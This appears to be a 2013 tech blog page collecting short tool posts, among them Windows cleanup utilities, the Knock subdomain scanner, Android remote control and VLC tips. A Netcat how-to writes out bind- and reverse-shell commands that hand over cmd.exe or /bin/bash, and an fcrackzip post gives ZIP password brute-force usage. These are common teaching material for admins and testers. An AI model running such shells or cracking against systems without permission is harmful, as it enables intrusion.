Tuesday, January 8, 2013

[Windows Medkit] Herramientas de Mantención para nuestro Windows


Cuando nuestro ordenador sufre un daño colateral ya sea por causa de un virus, errores o registros, es necesario acudir rápidamente a una herramienta para solucionar estos problemas, una que puede abarcar ese tema es Windows Medkit.

Por medio de una interfaz sencilla optimiza, da mantenimiento y además tiene un buen número de utilidades para solucionar los errores o fallos comúnes en Windows después de haber sufrido un ataque de infección o virus maligno.




También elimina el detestable y conocido archivo llamado “Autorun”, elimina archivos ocultos, explorador seguro de archivos, muestra los drivers intalados en el sistema y otras funciones viables incluidas.

Acá tienes el “botiquín informático” para recuperar el estado normal y seguro de tú ordenador.

[SpyBHORemover] Advanced tool to explore and remove Malicious BHO's from your system


SpyBHORemover (formerly BHORemover) is the advanced tool to explore and remove Malicious BHO's from your system.

BHO stands for 'Browser Helper Objects' which are plugins written for 'Internet Explorer' to enhance its capabilities. Often this feature is being misused by many spyware programs to monitor user's browsing habits and to steal the users credentials silently. Also some of the BHO's slow down the system considerably.
SpyBHORemover helps in quick identification and removal of such spy BHO's present in the system. It not only performs heuristic based threat analysis but also provides Online Threat Verification mechanism which makes it easy to differentiate between legitimate and malicious BHOs. 

It also presents 'Backup & Restore' feature which makes it easy to remove and re-install the BHO any number of times. Users no longer have to worry about accidental removal of BHO as all removed BHOs are automatically backed up which can then be restored from 'Removed BHO List'. It also comes with a unique feature to completely enable/disable all installed BHOs at one shot.

It works on wide range of platforms starting from Windows XP to latest operating system, Windows 8.

Screenshots
Here are the screenshots of SpyBHORemover in action.
 
Screenshot 1: SpyBHORemover displaying currently installed as well as removed BHO's from the local system. You can also see the Right Click Popup Menu showing various options for quick execution of desired action.
 
SpyBHORemover main screen
 
 
Screenshot 2: BHO scan report in HTML format generated by SpyBHORemover
 
SpyBHORemover export scan results

Download
FREE Download SpyBHORemover v4.5
   
License  : Freeware
Platform : Windows XP, 2003, Vista, Windows 7, Windows 8           



[Netcat] Howto Banner Grabbing, Bind Shell, Reverse Shell And Webserver

Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities

Although NetCat is not the state of the art tool anymore and it sends all packets uncrypted through the net, it´s still a very good tool for easy banner grabbing, binding shells or reverse shells.


Banner Grabbing Commandline:

nc -v 192.168.0.200 21

nslookup -querytype=mx debian.org
nc -v xxx.debian.org 25

nslookup -querytype=mx dell.com
nc -v xxx.dell.com 25

nc -v 192.168.0.200 80
GET / HTTP/1.1

nc -v www.dell.com 80
GET / HTTP/1.1

nc -v 192.168.0.200 21


Weberserver Commandline:


while true; do nc -l -p 80 -q 1 < bla.html; done


File Transfer Commandline:


windows maschine file server nc -lvp 4444 > captured.txt
linux maschine: nc -v target-ip < info.txt this cmd will send the content of the file INFO.TXT to the Server into the file CAPTURED.TXT

Shell Commandlines:


Bind Shell

windows maschine: nc -lvp 4444 -e cmd.exe
linux maschine: nc -v 192.168.0.200 4444

Connecting from the linux system to the windows system,
which isn´t located behind a NAT System.

Reverse Shell

windows maschine: nc -lvp 4444
linux maschine: nc -nv 192.168.0.200 4444 -e /bin/bash
/sbin/ifconfig

Sending a /bin/bash Shell from a Linux system behind a NAT to the
windows system, which is listening on port 4444. traversing NAT.

[Knock] Subdomain Scanner


Knock is a python script, written by Gianni 'guelfoweb' Amato, designed to enumerate subdomains on a target domain through a wordlist.

For more information I have posted a documentation page. If you want to see how it works, you can see this sample output:

  • Simple Scan
  • Zone Transfer Scan
  • Wildcard Bypass

  • New: Knock is now available on BackBox 2, Italian distribution for Penetration Test.
    In version 1.5 is enabled support to wildcard bypass.

    Video of Knock in action


    Common usage

    This tool can be useful in black box pentest to find vulnerable subdomains. Like testing.domain.com


    Current features

    Knock is targeted to:

  • Scan subdomains
  • DNS request for zone transfer
  • DNS resolver
  • Wildcard testing
  • Wildcard bypass

  • Required


  • Python version 2.x
  • DNSpython for Zone Transfer discovery

  • Note

    Knock works on Linux, Windows, MAC OS X and should theoretically work on some other platforms such as FreeBSD, OpenBSD, and proprietary Unixes with a python version 2.x

    Download

    Knock 1.5 for all operating system


    [Remote Web Desktop] Gestionar Android remotamente desde el PC


    Remote Web Desktop es una app que permite conectarnos a un dispositivo Android desde el escritorio de nuestro PC.

    Como digo, Remote Web Desktop nos permitirá conectarnos a nuestro dispositivo Android desde nuestro PC para poder gestionarlo remotamente de forma cómoda y sin necesidad de instalar nada adicional, ya que este control remoto se realizará vía web a través del propio navegador del PC.

    En otras palabras: Desde nuestro navegador podremos acceder remotamente al contenido de nuestro teléfono para gestionar varios aspectos como revisar y/o enviar mensajes SMS, acceder a los archivos almacenados en el terminal, previsualizar imágenes, convertir el smartphone en una webcam y usarla en el PC, gestionar los contactos, marcar números de teléfono o instalar aplicaciones cuyos paquetes APK tengamos almacenados en la tarjeta SD, etc…

    Así pues de esta forma podremos gestionar nuestro teléfono móvil sin necesidad de tenerlo físicamente presente… Sobre todo si somos un desastre en el manejo de la pantalla táctil, sin duda sacaremos chispas a este método de control tan cómodo y eficaz. La aplicación tiene una versión de pago, pero con la gratuita es más que suficiente para controlar los aspectos más importantes de tu móvil.

    [Fcrackzip] Romper Contraseñas de archivos *.zip

    La utilidad de este programa es mas bien simple, se basa en atackes con diccionario o con fuerza bruta para obtener la clave de un archivo .zip . Es muy parecido en uso y funcion a crark, asi que si habeis usado este no nos estrañara mucho la forma de usarlo.

    Para compilarlo desde los repositorios seria:

    sudo apt-get install fcrackzip
    o lo podemos descargar y compilar desde AQUI .

    Y ahora intentare detallar el modo de uso y las opciones disponibles que nos ofrece este programa:

    fcrackzip [-bDBchVvplum2] [--brute-force] [--dictionary] [--benchmark] [--charset characterset] [--help] [--validate] [--verbose] [--init-password string/path] [--length min-max] [--use-unzip] [--method name] [--modulo r/m] file…

    Opciones:

    -H , -help : Imprime el numero de version y (con suerte) algunas ideas utiles -V , -verbose : hace el programa mas detallado.
    -B , -brute-force : Utiliza la fuerza bruta con los parametros que detallemos. -D , -dictionary : leera un diccionario seleccionado por nosotros el cual solo puede contener una palabra por linea.
    -C ,
    -charset -charset-set-specification : selecciona los caracteres a usar en un ataque de fuerza bruta

    - a - incluira todas las letras en minusculas [abc...]

    - A - incluira todas las letras en mayusculas [ABC...]

    - 1 - usara solamente numeros [ 1234567890 ]
    - ! - usara solo caracteres especiale
    s [ !:$%&/()=?[]+*~# ]
    - : - tendra en cuenta los caracteres que especifiquemos siempre y cuando no sean binarios null (al menos bajo unix).

    Por ejemplo, a1: $% selecciona los caracteres en minúsculas, dígitos, el dólar y el signo de porcentaje

    - P , -init-password string - permite seleccionar el inicio de la contraseña (en el caso en que lo sepamos) tanto en modo de fuerza bruta como en modo de diccionario.
    - L , -length min[-max] : Indicamos la longitud de la contraseña o desde cuantos cararteres tiene que empezar y en cuantos terminar.
    - U , --use-unzip : esta opcion intenta descomprimir el archivo al encontrar la contraseña para evitar falsos positivos.
    - M , --method name : Usa el metodo numero "nombre" en lugar del metodo predeterminado, puedes usar --help para ver los metodos disponibles.
    - 2 , --modulo r/m : calcula solo el r/m de la clave. - B , --benchmark : poner una pequeña referencia.
    - V , --validate : hacer comprobaciones sobre el archivo.

    Unos ejemplos:fcrackzip-ca-p sample.zip aaaaaa
    -
    selecciona la longitud y que use los carateres en minusculas
    fcrackzip --method cpmask --charset A --init AAAA test.ppm
    - comprueba test.pmm para cuatro caracteres. -TP fcrackzip -D -p passwords.txt sample.zip verifica cada contraseña que se encuentre en el archivo password.txt

    Este programa promete ser rapido pero no especifica que equipo minimo hace falta para ello asi que espero que os valla bien.

    [Fuente]

    [VLC Player] Funciones y Trucos


    (VideoLan) VLC Media Player es un reproductor multimedia muy liviano, multiplataforma (Windows, Mac OS X, Linux, Android, iOS, etc) que permite reproducir cualquier vídeo gracias a la librería integrada ffmpeg  (que permite reproducir MPEG-2, DivX, H.264, MKV, WebM, WMV, MP3, etc)

    Guardar/Descargar vídeo de Youtube

    Medio > Abrir volcado de red... 



    Y en vez de Reproducir elige Convertir



    Selecciona el destino, el nombre del fichero y elige "Entrada de Volcado Raw"


    Grabar vídeos con tu webcam, Grabar escritorio, Grabar TV

    Medio > Abrir dispositivo de captura...

    Captura de pantalla y fotograma a fotograma

    Ver > Controles Avanzados


    Captura de pantalla de la imagen que estamos viendo en pantalla  y mostrar fotograma a fotograma para ir a cámara lenta.

    Grabar lo que ves en pantalla

    Ver > Controles Avanzados


    Botón grabar

    Conversión de Vídeos

    Medio > Convertir..

    En el ejemplo guardar el audio de un vídeo en un fichero mp3

    Escuchar y descargar música online

    Ver -> Listas de Reproducción
    O escuchar un Podcast

    Descarga el Scrobbler de Last.fm para agregar a tu perfil la música que escuchas de last.fm

    El Scrobbler rellena automáticamente tu colección y la actualiza con todo lo que has escuchado en tu PC o iPod.

    Scrobbler de Last.fm para Windows

    En VLC --> Herramientas --> Preferencias --> Mostrar todo --> Inerfaz --> Inerfaces de Control --> Audioscrobbler

    Mostrar lo que estás escuchando o viendo en el Messenger

    En VLC --> Herramientas --> Preferencias --> Mostrar todo --> Inerfaz --> Inerfaces de Control --> Reproduciendo ahora MSN


    Servidor de streaming

    Medio --> Emitir


    Escribe la IP pública en la ruta:
    Para reproducirlo:
    Medio --> Abrir volcado de red... y escribir la url http://ip_pública:8080 (puerto)
    También soporta Video on demand (VoD).

    Efecto ASCII Art en un vídeo


     Menú “Herramientas” y haz click sobre “Preferencias”. Allí selecciona la opción de “Vídeo” y luego en la sección “Módulo de salida” elige “Salida de vídeo ASCII-Art Color“.



    Cierra el VLC y reproduce un vídeo, el resultado es... algo así...(muy friki)


    Arreglar desfase audio con el vídeo

    Si falla la sincronización del sonido con el vídeo en nuestro PC

    Herramientas --> Sincronización de pista



    Añadir subtítulos

    Basta con poner el fichero de subtítulos en el mismo directorio que el video y VLC lo detectará o seleccionar el fichero:

    Vídeo --> Pista de subtítulos --> abrir archivo


    Ver Información códec de un vídeo

    Herramientas --> Información del códec



    Controlar VLC de forma remota por interfaz web o por Android

    Puedes controlarlo vía web con un navegador:





    O con tu smartphone ya sea Android o un iphone con iOS





    \VideoLAN\VLC\lua\http\.hosts

    Recordad que por defecto, a partir de la línea private addresses se niega la conexión a cualquier dispositivo externo a la PC. Para ello descomentamos aquellas líneas que limitan el acceso remoto a VLC, es decir, le quitamos el símbolo # delante de cada línea.




    #
    # Access-list for VLC HTTP interface
    $Id$
    #

    # localhost
    ::1
    127.0.0.1

    # link-local addresses
    fe80::/64

    # private addresses
    fc00::/7
    fec0::/10
    10.0.0.0/8
    172.16.0.0/12
    192.168.0.0/16
    169.254.0.0/16

    # The world (uncommenting these 2 lines is not quite safe)
    #::/0
    #0.0.0.0/0

    Atajos de teclado en VLC

    • Pantalla completa: f / ALT+ENTER / Doble click sobre el video
    • Salir de pantalla completa: ESC / Doble click sobre el video
    • Reproducir (Play) / Pausa: Barra espaciadora
    • Reproducir más rápido (FF): +
    • Reproducir más despacio (Cámara lenta): -
    • Reproducir cuadro por cuadro: mantener presionada la tecla “-” hasta que se llegue a la mínima velocidad.
    • Reproducir a velocidad normal: = (lo cambiaría por “*”, más cómodo)
    • Avanzar un minuto: CRTL+Derecha
    • Retroceder un minuto: CRTL+Izquierda
    • Subir el volumen: CTRL+Arriba
    • Bajar el volumen: CTRL+Abajo
    • Silenciar: m (para volver a escuchar pulsar nuevamente “m”)
    • Zoom (+): z
    • Zoom (-): May+z
    • Capturar imagen: May+s
    Para sincronizar el audio también hay atajos:
    • Atrasar el sonido: k
    • Adelantar el sonido: j
    También los hay para sincronizar subtítulos:
    • Atrasar subtítulo: h
    • Adelantar subtítulo: g